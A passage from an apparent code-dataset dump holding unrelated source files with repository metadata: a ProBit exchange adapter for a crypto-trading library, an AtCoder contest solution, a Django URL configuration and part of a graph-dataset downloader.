'NOT_ALLOWED_COMBINATION': BadRequest,
'INVALID_ORDER': InvalidOrder, # Requested order does not exist, or it is not your order
'RATE_LIMIT_EXCEEDED': RateLimitExceeded, # You are sending requests too frequently. Please try it later.
'MARKET_UNAVAILABLE': ExchangeNotAvailable, # Market is closed today
'INVALID_MARKET': BadSymbol, # Requested market is not exist
'INVALID_CURRENCY': BadRequest, # Requested currency is not exist on ProBit system
'TOO_MANY_OPEN_ORDERS': DDoSProtection, # Too many open orders
'DUPLICATE_ADDRESS': InvalidAddress, # Address already exists in withdrawal address list
},
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
},
'precisionMode': TICK_SIZE,
'options': {
'createMarketBuyOrderRequiresPrice': True,
'timeInForce': {
'limit': 'gtc',
'market': 'ioc',
},
},
'commonCurrencies': {
'BTCBEAR': 'BEAR',
'BTCBULL': 'BULL',
'CBC': 'CryptoBharatCoin',
'UNI': 'UNICORN Token',
},
})
def fetch_markets(self, params={}):
response = self.publicGetMarket(params)
#
# {
# "data":[
# {
# "id":"MONA-USDT",
# "base_currency_id":"MONA",
# "quote_currency_id":"USDT",
# "min_price":"0.001",
# "max_price":"9999999999999999",
# "price_increment":"0.001",
# "min_quantity":"0.0001",
# "max_quantity":"9999999999999999",
# "quantity_precision":4,
# "min_cost":"1",
# "max_cost":"9999999999999999",
# "cost_precision":8,
# "taker_fee_rate":"0.2",
# "maker_fee_rate":"0.2",
# "show_in_ui":true,
# "closed":false
# },
# ]
# }
#
markets = self.safe_value(response, 'data', [])
result = []
for i in range(0, len(markets)):
market = markets[i]
id = self.safe_string(market, 'id')
baseId = self.safe_string(market, 'base_currency_id')
quoteId = self.safe_string(market, 'quote_currency_id')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
closed = self.safe_value(market, 'closed', False)
active = not closed
amountPrecision = self.safe_integer(market, 'quantity_precision')
costPrecision = self.safe_integer(market, 'cost_precision')
precision = {
'amount': 1 / math.pow(10, amountPrecision),
'price': self.safe_float(market, 'price_increment'),
'cost': 1 / math.pow(10, costPrecision),
}
takerFeeRate = self.safe_float(market, 'taker_fee_rate')
makerFeeRate = self.safe_float(market, 'maker_fee_rate')
result.append({
'id': id,
'info': market,
'symbol': symbol,
'base': base,
'quote': quote,
'baseId': baseId,
'quoteId': quoteId,
'active': active,
'precision': precision,
'taker': takerFeeRate / 100,
'maker': makerFeeRate / 100,
'limits': {
'amount': {
'min': self.safe_float(market, 'min_quantity'),
'max': self.safe_float(market, 'max_quantity'),
},
'price': {
'min': self.safe_float(market, 'min_price'),
'max': self.safe_float(market, 'max_price'),
},
'cost': {
'min': self.safe_float(market, 'min_cost'),
'max': self.safe_float(market, 'max_cost'),
},
},
})
return result
def fetch_currencies(self, params={}):
response = self.publicGetCurrencyWithPlatform(params)
#
# {
# "data":[
# {
# "id":"USDT",
# "display_name":{"ko-kr":"테더","en-us":"Tether"},
# "show_in_ui":true,
# "platform":[
# {
# "id":"ETH",
# "priority":1,
# "deposit":true,
# "withdrawal":true,
# "currency_id":"USDT",
# "precision":6,
# "min_confirmation_count":15,
# "require_destination_tag":false,
# "display_name":{"name":{"ko-kr":"ERC-20","en-us":"ERC-20"}},
# "min_deposit_amount":"0",
# "min_withdrawal_amount":"1",
# "withdrawal_fee":[
# {"amount":"0.01","priority":2,"currency_id":"ETH"},
# {"amount":"1.5","priority":1,"currency_id":"USDT"},
# ],
# "deposit_fee":{},
# "suspended_reason":"",
# "deposit_suspended":false,
# "withdrawal_suspended":false
# },
# {
# "id":"OMNI",
# "priority":2,
# "deposit":true,
# "withdrawal":true,
# "currency_id":"USDT",
# "precision":6,
# "min_confirmation_count":3,
# "require_destination_tag":false,
# "display_name":{"name":{"ko-kr":"OMNI","en-us":"OMNI"}},
# "min_deposit_amount":"0",
# "min_withdrawal_amount":"5",
# "withdrawal_fee":[{"amount":"5","priority":1,"currency_id":"USDT"}],
# "deposit_fee":{},
# "suspended_reason":"wallet_maintenance",
# "deposit_suspended":false,
# "withdrawal_suspended":false
# }
# ],
# "stakeable":false,
# "unstakeable":false,
# "auto_stake":false,
# "auto_stake_amount":"0"
# }
# ]
# }
#
currencies = self.safe_value(response, 'data')
result = {}
for i in range(0, len(currencies)):
currency = currencies[i]
id = self.safe_string(currency, 'id')
code = self.safe_currency_code(id)
displayName = self.safe_value(currency, 'display_name')
name = self.safe_string(displayName, 'en-us')
platforms = self.safe_value(currency, 'platform', [])
platformsByPriority = self.sort_by(platforms, 'priority')
platform = self.safe_value(platformsByPriority, 0, {})
precision = self.safe_integer(platform, 'precision')
depositSuspended = self.safe_value(platform, 'deposit_suspended')
withdrawalSuspended = self.safe_value(platform, 'withdrawal_suspended')
active = not (depositSuspended and withdrawalSuspended)
withdrawalFees = self.safe_value(platform, 'withdrawal_fee', {})
withdrawalFeesByPriority = self.sort_by(withdrawalFees, 'priority')
withdrawalFee = self.safe_value(withdrawalFeesByPriority, 0, {})
fee = self.safe_float(withdrawalFee, 'amount')
result[code] = {
'id': id,
'code': code,
'info': currency,
'name': name,
'active': active,
'fee': fee,
'precision': precision,
'limits': {
'amount': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'price': {
'min': math.pow(10, -precision),
'max': math.pow(10, precision),
},
'cost': {
'min': None,
'max': None,
},
'deposit': {
'min': self.safe_float(platform, 'min_deposit_amount'),
'max': None,
},
'withdraw': {
'min': self.safe_float(platform, 'min_withdrawal_amount'),
'max': None,
},
},
}
return result
def fetch_balance(self, params={}):
self.load_markets()
response = self.privateGetBalance(params)
#
# {
# data: [
# {
# "currency_id":"XRP",
# "total":"100",
# "available":"0",
# }
# ]
# }
#
data = self.safe_value(response, 'data')
result = {'info': data}
for i in range(0, len(data)):
balance = data[i]
currencyId = self.safe_string(balance, 'currency_id')
code = self.safe_currency_code(currencyId)
account = self.account()
account['total'] = self.safe_float(balance, 'total')
account['free'] = self.safe_float(balance, 'available')
result[code] = account
return self.parse_balance(result)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market_id': market['id'],
}
response = self.publicGetOrderBook(self.extend(request, params))
#
# {
# data: [
# {side: 'buy', price: '0.000031', quantity: '10'},
# {side: 'buy', price: '0.00356007', quantity: '4.92156877'},
# {side: 'sell', price: '0.1857', quantity: '0.17'},
# ]
# }
#
data = self.safe_value(response, 'data', [])
dataBySide = self.group_by(data, 'side')
return self.parse_order_book(dataBySide, None, 'buy', 'sell', 'price', 'quantity')
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
request = {}
if symbols is not None:
marketIds = self.market_ids(symbols)
request['market_ids'] = ','.join(marketIds)
response = self.publicGetTicker(self.extend(request, params))
#
# {
# "data":[
# {
# "last":"0.022902",
# "low":"0.021693",
# "high":"0.024093",
# "change":"-0.000047",
# "base_volume":"15681.986",
# "quote_volume":"360.514403624",
# "market_id":"ETH-BTC",
# "time":"2020-04-12T18:43:38.000Z"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_tickers(data, symbols)
def parse_tickers(self, rawTickers, symbols=None):
tickers = []
for i in range(0, len(rawTickers)):
tickers.append(self.parse_ticker(rawTickers[i]))
return self.filter_by_array(tickers, 'symbol', symbols)
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market_ids': market['id'],
}
response = self.publicGetTicker(self.extend(request, params))
#
# {
# "data":[
# {
# "last":"0.022902",
# "low":"0.021693",
# "high":"0.024093",
# "change":"-0.000047",
# "base_volume":"15681.986",
# "quote_volume":"360.514403624",
# "market_id":"ETH-BTC",
# "time":"2020-04-12T18:43:38.000Z"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
ticker = self.safe_value(data, 0)
if ticker is None:
raise BadResponse(self.id + ' fetchTicker() returned an empty response')
return self.parse_ticker(ticker, market)
def parse_ticker(self, ticker, market=None):
#
# {
# "last":"0.022902",
# "low":"0.021693",
# "high":"0.024093",
# "change":"-0.000047",
# "base_volume":"15681.986",
# "quote_volume":"360.514403624",
# "market_id":"ETH-BTC",
# "time":"2020-04-12T18:43:38.000Z"
# }
#
timestamp = self.parse8601(self.safe_string(ticker, 'time'))
marketId = self.safe_string(ticker, 'market_id')
symbol = self.safe_symbol(marketId, market, '-')
close = self.safe_float(ticker, 'last')
change = self.safe_float(ticker, 'change')
percentage = None
open = None
if change is not None:
if close is not None:
open = close - change
percentage = (change / open) * 100
baseVolume = self.safe_float(ticker, 'base_volume')
quoteVolume = self.safe_float(ticker, 'quote_volume')
vwap = self.vwap(baseVolume, quoteVolume)
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_float(ticker, 'high'),
'low': self.safe_float(ticker, 'low'),
'bid': None,
'bidVolume': None,
'ask': None,
'askVolume': None,
'vwap': vwap,
'open': open,
'close': close,
'last': close,
'previousClose': None, # previous day close
'change': change,
'percentage': percentage,
'average': None,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
market = None
request = {
'limit': 100,
'start_time': self.iso8601(0),
'end_time': self.iso8601(self.milliseconds()),
}
if symbol is not None:
market = self.market(symbol)
request['market_id'] = market['id']
if since is not None:
request['start_time'] = self.iso8601(since)
if limit is not None:
request['limit'] = limit
response = self.privateGetTradeHistory(self.extend(request, params))
#
# {
# data: [
# {
# "id":"BTC-USDT:183566",
# "order_id":"17209376",
# "side":"sell",
# "fee_amount":"0.657396569175",
# "fee_currency_id":"USDT",
# "status":"settled",
# "price":"6573.96569175",
# "quantity":"0.1",
# "cost":"657.396569175",
# "time":"2018-08-10T06:06:46.000Z",
# "market_id":"BTC-USDT"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, market, since, limit)
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'market_id': market['id'],
'limit': 100,
'start_time': '1970-01-01T00:00:00.000Z',
'end_time': self.iso8601(self.milliseconds()),
}
if since is not None:
request['start_time'] = self.iso8601(since)
if limit is not None:
request['limit'] = limit
response = self.publicGetTrade(self.extend(request, params))
#
# {
# "data":[
# {
# "id":"ETH-BTC:3331886",
# "price":"0.022981",
# "quantity":"12.337",
# "time":"2020-04-12T20:55:42.371Z",
# "side":"sell",
# "tick_direction":"down"
# },
# {
# "id":"ETH-BTC:3331885",
# "price":"0.022982",
# "quantity":"6.472",
# "time":"2020-04-12T20:55:39.652Z",
# "side":"sell",
# "tick_direction":"down"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, market, since, limit)
def parse_trade(self, trade, market=None):
#
# fetchTrades(public)
#
# {
# "id":"ETH-BTC:3331886",
# "price":"0.022981",
# "quantity":"12.337",
# "time":"2020-04-12T20:55:42.371Z",
# "side":"sell",
# "tick_direction":"down"
# }
#
# fetchMyTrades(private)
#
# {
# "id":"BTC-USDT:183566",
# "order_id":"17209376",
# "side":"sell",
# "fee_amount":"0.657396569175",
# "fee_currency_id":"USDT",
# "status":"settled",
# "price":"6573.96569175",
# "quantity":"0.1",
# "cost":"657.396569175",
# "time":"2018-08-10T06:06:46.000Z",
# "market_id":"BTC-USDT"
# }
#
timestamp = self.parse8601(self.safe_string(trade, 'time'))
id = self.safe_string(trade, 'id')
marketId = None
if id is not None:
parts = id.split(':')
marketId = self.safe_string(parts, 0)
marketId = self.safe_string(trade, 'market_id', marketId)
symbol = self.safe_symbol(marketId, market, '-')
side = self.safe_string(trade, 'side')
price = self.safe_float(trade, 'price')
amount = self.safe_float(trade, 'quantity')
cost = None
if price is not None:
if amount is not None:
cost = price * amount
orderId = self.safe_string(trade, 'order_id')
feeCost = self.safe_float(trade, 'fee_amount')
fee = None
if feeCost is not None:
feeCurrencyId = self.safe_string(trade, 'fee_currency_id')
feeCurrencyCode = self.safe_currency_code(feeCurrencyId)
fee = {
'cost': feeCost,
'currency': feeCurrencyCode,
}
return {
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': symbol,
'order': orderId,
'type': None,
'side': side,
'takerOrMaker': None,
'price': price,
'amount': amount,
'cost': cost,
'fee': fee,
}
def fetch_time(self, params={}):
response = self.publicGetTime(params)
#
# {"data":"2020-04-12T18:54:25.390Z"}
#
timestamp = self.parse8601(self.safe_string(response, 'data'))
return timestamp
def normalize_ohlcv_timestamp(self, timestamp, timeframe, after=False):
duration = self.parse_timeframe(timeframe)
if timeframe == '1M':
iso8601 = self.iso8601(timestamp)
parts = iso8601.split('-')
year = self.safe_string(parts, 0)
month = self.safe_integer(parts, 1)
if after:
month = self.sum(month, 1)
if month < 10:
month = '0' + str(month)
else:
month = str(month)
return year + '-' + month + '-01T00:00:00.000Z'
elif timeframe == '1w':
timestamp = int(timestamp / 1000)
firstSunday = 259200 # 1970-01-04T00:00:00.000Z
difference = timestamp - firstSunday
numWeeks = self.integer_divide(difference, duration)
previousSunday = self.sum(firstSunday, numWeeks * duration)
if after:
previousSunday = self.sum(previousSunday, duration)
return self.iso8601(previousSunday * 1000)
else:
timestamp = int(timestamp / 1000)
timestamp = duration * int(timestamp / duration)
if after:
timestamp = self.sum(timestamp, duration)
return self.iso8601(timestamp * 1000)
def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
interval = self.timeframes[timeframe]
limit = 100 if (limit is None) else limit
requestLimit = self.sum(limit, 1)
requestLimit = min(1000, requestLimit) # max 1000
request = {
'market_ids': market['id'],
'interval': interval,
'sort': 'asc', # 'asc' will always include the start_time, 'desc' will always include end_time
'limit': requestLimit, # max 1000
}
now = self.milliseconds()
duration = self.parse_timeframe(timeframe)
startTime = since
endTime = now
if since is None:
if limit is None:
raise ArgumentsRequired(self.id + ' fetchOHLCV requires either a since argument or a limit argument')
else:
startTime = now - limit * duration * 1000
else:
if limit is None:
endTime = now
else:
endTime = self.sum(since, self.sum(limit, 1) * duration * 1000)
startTimeNormalized = self.normalize_ohlcv_timestamp(startTime, timeframe)
endTimeNormalized = self.normalize_ohlcv_timestamp(endTime, timeframe, True)
request['start_time'] = startTimeNormalized
request['end_time'] = endTimeNormalized
response = self.publicGetCandle(self.extend(request, params))
#
# {
# "data":[
# {
# "market_id":"ETH-BTC",
# "open":"0.02811",
# "close":"0.02811",
# "low":"0.02811",
# "high":"0.02811",
# "base_volume":"0.0005",
# "quote_volume":"0.000014055",
# "start_time":"2018-11-30T18:19:00.000Z",
# "end_time":"2018-11-30T18:20:00.000Z"
# },
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_ohlcvs(data, market, timeframe, since, limit)
def parse_ohlcv(self, ohlcv, market=None):
#
# {
# "market_id":"ETH-BTC",
# "open":"0.02811",
# "close":"0.02811",
# "low":"0.02811",
# "high":"0.02811",
# "base_volume":"0.0005",
# "quote_volume":"0.000014055",
# "start_time":"2018-11-30T18:19:00.000Z",
# "end_time":"2018-11-30T18:20:00.000Z"
# }
#
return [
self.parse8601(self.safe_string(ohlcv, 'start_time')),
self.safe_float(ohlcv, 'open'),
self.safe_float(ohlcv, 'high'),
self.safe_float(ohlcv, 'low'),
self.safe_float(ohlcv, 'close'),
self.safe_float(ohlcv, 'base_volume'),
]
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
since = self.parse8601(since)
request = {}
market = None
if symbol is not None:
market = self.market(symbol)
request['market_id'] = market['id']
response = self.privateGetOpenOrder(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_orders(data, market, since, limit)
def fetch_closed_orders(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
request = {
'start_time': self.iso8601(0),
'end_time': self.iso8601(self.milliseconds()),
'limit': 100,
}
market = None
if symbol is not None:
market = self.market(symbol)
request['market_id'] = market['id']
if since:
request['start_time'] = self.iso8601(since)
if limit:
request['limit'] = limit
response = self.privateGetOrderHistory(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_orders(data, market, since, limit)
def fetch_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrder requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'market_id': market['id'],
}
clientOrderId = self.safe_string_2(params, 'clientOrderId', 'client_order_id')
if clientOrderId is not None:
request['client_order_id'] = clientOrderId
else:
request['order_id'] = id
query = self.omit(params, ['clientOrderId', 'client_order_id'])
response = self.privateGetOrder(self.extend(request, query))
data = self.safe_value(response, 'data', [])
order = self.safe_value(data, 0)
return self.parse_order(order, market)
def parse_order_status(self, status):
statuses = {
'open': 'open',
'cancelled': 'canceled',
'filled': 'closed',
}
return self.safe_string(statuses, status, status)
def parse_order(self, order, market=None):
#
# {
# id: string,
# user_id: string,
# market_id: string,
# type: 'orderType',
# side: 'side',
# quantity: string,
# limit_price: string,
# time_in_force: 'timeInForce',
# filled_cost: string,
# filled_quantity: string,
# open_quantity: string,
# cancelled_quantity: string,
# status: 'orderStatus',
# time: 'date',
# client_order_id: string,
# }
#
status = self.parse_order_status(self.safe_string(order, 'status'))
id = self.safe_string(order, 'id')
type = self.safe_string(order, 'type')
side = self.safe_string(order, 'side')
marketId = self.safe_string(order, 'market_id')
symbol = self.safe_symbol(marketId, market, '-')
timestamp = self.parse8601(self.safe_string(order, 'time'))
price = self.safe_float(order, 'limit_price')
filled = self.safe_float(order, 'filled_quantity')
remaining = self.safe_float(order, 'open_quantity')
canceledAmount = self.safe_float(order, 'cancelled_quantity')
if canceledAmount is not None:
remaining = self.sum(remaining, canceledAmount)
amount = self.safe_float(order, 'quantity', self.sum(filled, remaining))
cost = self.safe_float_2(order, 'filled_cost', 'cost')
if type == 'market':
price = None
average = None
if filled is not None:
if cost is None:
if price is not None:
cost = price * filled
if cost is not None:
if filled > 0:
average = cost / filled
clientOrderId = self.safe_string(order, 'client_order_id')
if clientOrderId == '':
clientOrderId = None
timeInForce = self.safe_string_upper(order, 'time_in_force')
return {
'id': id,
'info': order,
'clientOrderId': clientOrderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': symbol,
'type': type,
'timeInForce': timeInForce,
'side': side,
'status': status,
'price': price,
'stopPrice': None,
'amount': amount,
'filled': filled,
'remaining': remaining,
'average': average,
'cost': cost,
'fee': None,
'trades': None,
}
def cost_to_precision(self, symbol, cost):
return self.decimal_to_precision(cost, TRUNCATE, self.markets[symbol]['precision']['cost'], self.precisionMode)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
market = self.market(symbol)
options = self.safe_value(self.options, 'timeInForce')
defaultTimeInForce = self.safe_value(options, type)
timeInForce = self.safe_string_2(params, 'timeInForce', 'time_in_force', defaultTimeInForce)
request = {
'market_id': market['id'],
'type': type,
'side': side,
'time_in_force': timeInForce,
}
clientOrderId = self.safe_string_2(params, 'clientOrderId', 'client_order_id')
if clientOrderId is not None:
request['client_order_id'] = clientOrderId
costToPrecision = None
if type == 'limit':
request['limit_price'] = self.price_to_precision(symbol, price)
request['quantity'] = self.amount_to_precision(symbol, amount)
elif type == 'market':
# for market buy it requires the amount of quote currency to spend
if side == 'buy':
cost = self.safe_float(params, 'cost')
createMarketBuyOrderRequiresPrice = self.safe_value(self.options, 'createMarketBuyOrderRequiresPrice', True)
if createMarketBuyOrderRequiresPrice:
if price is not None:
if cost is None:
cost = amount * price
elif cost is None:
raise InvalidOrder(self.id + " createOrder() requires the price argument for market buy orders to calculate total order cost(amount to spend), where cost = amount * price. Supply a price argument to createOrder() call if you want the cost to be calculated for you from price and amount, or, alternatively, add .options['createMarketBuyOrderRequiresPrice'] = False and supply the total cost value in the 'amount' argument or in the 'cost' extra parameter(the exchange-specific behaviour)")
else:
cost = amount if (cost is None) else cost
costToPrecision = self.cost_to_precision(symbol, cost)
request['cost'] = costToPrecision
else:
request['quantity'] = self.amount_to_precision(symbol, amount)
query = self.omit(params, ['timeInForce', 'time_in_force', 'clientOrderId', 'client_order_id'])
response = self.privatePostNewOrder(self.extend(request, query))
#
# {
# data: {
# id: string,
# user_id: string,
# market_id: string,
# type: 'orderType',
# side: 'side',
# quantity: string,
# limit_price: string,
# time_in_force: 'timeInForce',
# filled_cost: string,
# filled_quantity: string,
# open_quantity: string,
# cancelled_quantity: string,
# status: 'orderStatus',
# time: 'date',
# client_order_id: string,
# }
# }
#
data = self.safe_value(response, 'data')
order = self.parse_order(data, market)
# a workaround for incorrect huge amounts
# returned by the exchange on market buys
if (type == 'market') and (side == 'buy'):
order['amount'] = None
order['cost'] = float(costToPrecision)
order['remaining'] = None
return order
def cancel_order(self, id, symbol=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' cancelOrder requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'market_id': market['id'],
'order_id': id,
}
response = self.privatePostCancelOrder(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_order(data)
def parse_deposit_address(self, depositAddress, currency=None):
address = self.safe_string(depositAddress, 'address')
tag = self.safe_string(depositAddress, 'destination_tag')
currencyId = self.safe_string(depositAddress, 'currency_id')
code = self.safe_currency_code(currencyId)
self.check_address(address)
return {
'currency': code,
'address': address,
'tag': tag,
'info': depositAddress,
}
def fetch_deposit_address(self, code, params={}):
self.load_markets()
currency = self.currency(code)
request = {
'currency_id': currency['id'],
}
response = self.privateGetDepositAddress(self.extend(request, params))
#
# {
# "data":[
# {
# "currency_id":"ETH",
# "address":"0x12e2caf3c4051ba1146e612f532901a423a9898a",
# "destination_tag":null
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
firstAddress = self.safe_value(data, 0)
if firstAddress is None:
raise InvalidAddress(self.id + ' fetchDepositAddress returned an empty response')
return self.parse_deposit_address(firstAddress, currency)
def fetch_deposit_addresses(self, codes=None, params={}):
self.load_markets()
request = {}
if codes:
currencyIds = []
for i in range(0, len(codes)):
currency = self.currency(codes[i])
currencyIds.append(currency['id'])
request['currency_id'] = ','.join(codes)
response = self.privateGetDepositAddress(self.extend(request, params))
data = self.safe_value(response, 'data', [])
return self.parse_deposit_addresses(data)
def parse_deposit_addresses(self, addresses):
result = {}
for i in range(0, len(addresses)):
address = self.parse_deposit_address(addresses[i])
code = address['currency']
result[code] = address
return result
def withdraw(self, code, amount, address, tag=None, params={}):
# In order to use self method
# you need to allow API withdrawal from the API Settings Page, and
# and register the list of withdrawal addresses and destination tags on the API Settings page
# you can only withdraw to the registered addresses using the API
self.check_address(address)
self.load_markets()
currency = self.currency(code)
if tag is None:
tag = ''
request = {
'currency_id': currency['id'],
# 'platform_id': 'ETH', # if omitted it will use the default platform for the currency
'address': address,
'destination_tag': tag,
'amount': self.currency_to_precision(code, amount),
# which currency to pay the withdrawal fees
# only applicable for currencies that accepts multiple withdrawal fee options
# 'fee_currency_id': 'ETH', # if omitted it will use the default fee policy for each currency
# whether the amount field includes fees
# 'include_fee': False, # makes sense only when fee_currency_id is equal to currency_id
}
response = self.privatePostWithdrawal(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_transaction(data, currency)
def parse_transaction(self, transaction, currency=None):
id = self.safe_string(transaction, 'id')
amount = self.safe_float(transaction, 'amount')
address = self.safe_string(transaction, 'address')
tag = self.safe_string(transaction, 'destination_tag')
txid = self.safe_string(transaction, 'hash')
timestamp = self.parse8601(self.safe_string(transaction, 'time'))
type = self.safe_string(transaction, 'type')
currencyId = self.safe_string(transaction, 'currency_id')
code = self.safe_currency_code(currencyId)
status = self.parse_transaction_status(self.safe_string(transaction, 'status'))
feeCost = self.safe_float(transaction, 'fee')
fee = None
if feeCost is not None and feeCost != 0:
fee = {
'currency': code,
'cost': feeCost,
}
return {
'id': id,
'currency': code,
'amount': amount,
'addressFrom': None,
'address': address,
'addressTo': address,
'tagFrom': None,
'tag': tag,
'tagTo': tag,
'status': status,
'type': type,
'txid': txid,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'fee': fee,
'info': transaction,
}
def parse_transaction_status(self, status):
statuses = {
'requested': 'pending',
'pending': 'pending',
'confirming': 'pending',
'confirmed': 'pending',
'applying': 'pending',
'done': 'ok',
'cancelled': 'canceled',
'cancelling': 'canceled',
}
return self.safe_string(statuses, status, status)
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'][api] + '/'
query = self.omit(params, self.extract_params(path))
if api == 'accounts':
self.check_required_credentials()
url += self.implode_params(path, params)
auth = self.apiKey + ':' + self.secret
auth64 = self.string_to_base64(auth)
headers = {
'Authorization': 'Basic ' + self.decode(auth64),
'Content-Type': 'application/json',
}
if query:
body = self.json(query)
else:
url += self.version + '/'
if api == 'public':
url += self.implode_params(path, params)
if query:
url += '?' + self.urlencode(query)
elif api == 'private':
now = self.milliseconds()
self.check_required_credentials()
expires = self.safe_integer(self.options, 'expires')
if (expires is None) or (expires < now):
raise AuthenticationError(self.id + ' access token expired, call signIn() method')
accessToken = self.safe_string(self.options, 'accessToken')
headers = {
'Authorization': 'Bearer ' + accessToken,
}
url += self.implode_params(path, params)
if method == 'GET':
if query:
url += '?' + self.urlencode(query)
elif query:
body = self.json(query)
headers['Content-Type'] = 'application/json'
return {'url': url, 'method': method, 'body': body, 'headers': headers}
def sign_in(self, params={}):
self.check_required_credentials()
request = {
'grant_type': 'client_credentials', # the only supported value
}
response = self.accountsPostToken(self.extend(request, params))
#
# {
# access_token: '0ttDv/2hTTn3bLi8GP1gKaneiEQ6+0hOBenPrxNQt2s=',
# token_type: 'bearer',
# expires_in: 900
# }
#
expiresIn = self.safe_integer(response, 'expires_in')
accessToken = self.safe_string(response, 'access_token')
self.options['accessToken'] = accessToken
self.options['expires'] = self.sum(self.milliseconds(), expiresIn * 1000)
return response
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is None:
return # fallback to default error handler
if 'errorCode' in response:
errorCode = self.safe_string(response, 'errorCode')
message = self.safe_string(response, 'message')
if errorCode is not None:
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['exact'], errorCode, feedback)
raise ExchangeError(feedback)
| [
"[email protected]"
] | |
a44a8301d9cf018c0b5ff5bc64748a1262eda343 | b9eb496c4551fd091954675a61382636fc68e715 | /src/ABC1xx/ABC14x/ABC140/ABC140B.py | 8357fa46e4c56c5d78f10b2adcc2a1f6074cfb70 | [] | no_license | kttaroha/AtCoder | af4c5783d89a61bc6a40f59be5e0992980cc8467 | dc65ce640954da8c2ad0d1b97580da50fba98a55 | refs/heads/master | 2021-04-17T16:52:09.508706 | 2020-11-22T05:45:08 | 2020-11-22T05:45:08 | 249,460,649 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 339 | py | def main():
_ = int(input())
A = list(map(int, input().split()))
B = list(map(int, input().split()))
C = list(map(int, input().split()))
prev = -100
s = 0
for a in A:
s += B[a-1]
if a - prev == 1:
s += C[prev-1]
prev = a
print(s)
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
2b67e235a3490fd768faa695ff32d76ed01f6f61 | a6bd25c3508d45134436bc3a39345e2565debec0 | /Assignment1/urls.py | 1fec19327932a4d972c8807b1a1ec09c09df8b86 | [] | no_license | gitNikhilsahu/Django-Business-Employee-Management | 2a869dbf9c0aac078662b09db708b7c03b372c5c | e1c6d1588561abf193d70ca4cb91c912c3ea66d1 | refs/heads/master | 2022-12-17T07:58:25.655611 | 2020-09-25T08:43:18 | 2020-09-25T08:43:18 | 298,517,130 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
urlpatterns = [
path('', include('business.urls')),
path('employee/', include('employee.urls')),
path('admin/', admin.site.urls),
]
if settings.DEBUG:
urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| [
"[email protected]"
] | |
bf63fe697c539ec382672dc75ea18cf93dae240b | 71d4cc88c68f957a37a2db8234f8178ad2c1c769 | /graphgallery/data/npz_dataset.py | 8e769181796d82f0fa694a5ba370dd41a5b82c3e | [
"MIT"
] | permissive | MLDL/GraphGallery | 3159e0b8ddb1d2fa6b7cea4a27ba075f97db0a03 | 2474622286f135ca693c62981f5a4c4b31bcd2e6 | refs/heads/master | 2022-12-28T03:03:48.516408 | 2020-09-26T16:08:05 | 2020-09-26T16:08:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,080 | py | import os
import zipfile
import os.path as osp
import numpy as np
from graphgallery.data import Dataset
from graphgallery.data.io import makedirs, files_exist, download_file
from graphgallery.data.graph import Graph, load_dataset
_DATASETS = ('citeseer', 'cora', 'cora_ml', 'cora_full', 'amazon_cs', 'amazon_photo',
'coauthor_cs', 'coauthor_phy', 'polblogs', 'pubmed', 'flickr', 'flickr_sdm', 'blogcatalog')
class NPZDataset(Dataset):
github_url = "https://raw.githubusercontent.com/EdisonLeeeee/GraphData/master/datasets/npz/{}.npz"
supported_datasets = _DATASETS
def __init__(self, name, root=None, url=None, standardize=False, verbose=True):
if not name.lower() in self.supported_datasets:
print(f"Dataset not Found. Using custom dataset: {name}.\n")
super().__init__(name, root, verbose)
self._url = url
self.download_dir = osp.join(self.root, "npz")
self.standardize = standardize
makedirs(self.download_dir)
self.download()
self.process()
def download(self):
if files_exist(self.raw_paths):
print(f"Downloaded dataset files have existed.")
if self.verbose:
self.print_files(self.raw_paths)
return
self.print_files(self.raw_paths)
print("Downloading...")
download_file(self.raw_paths, self.urls)
